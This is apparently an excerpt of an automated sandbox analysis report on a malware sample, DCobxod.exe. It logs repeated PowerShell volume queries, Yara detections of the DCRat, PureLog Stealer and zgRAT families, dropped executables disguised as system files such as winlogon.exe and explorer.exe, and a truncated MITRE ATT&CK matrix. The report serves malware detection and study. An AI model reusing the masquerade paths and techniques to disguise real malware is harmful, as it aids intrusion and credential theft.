                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeQueries volume information: C:\ProgramData\SoftwareDistribution\winlogon.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeQueries volume information: C:\ProgramData\SoftwareDistribution\winlogon.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe VolumeInformation
                                    Source: C:\Browserhost\intoHostperf.exeQueries volume information: C:\Browserhost\intoHostperf.exe VolumeInformation
                                    Source: C:\Browserhost\intoHostperf.exeQueries volume information: C:\Browserhost\intoHostperf.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0042DF1E
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041B146 GetVersionExW,0_2_0041B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: intoHostperf.exe PID: 5828, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: DCobxod.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Browserhost\intoHostperf.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: DCobxod.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Browserhost\intoHostperf.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: intoHostperf.exe PID: 5828, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: DCobxod.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Browserhost\intoHostperf.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: DCobxod.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Browserhost\intoHostperf.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		OS Credential Dumping1
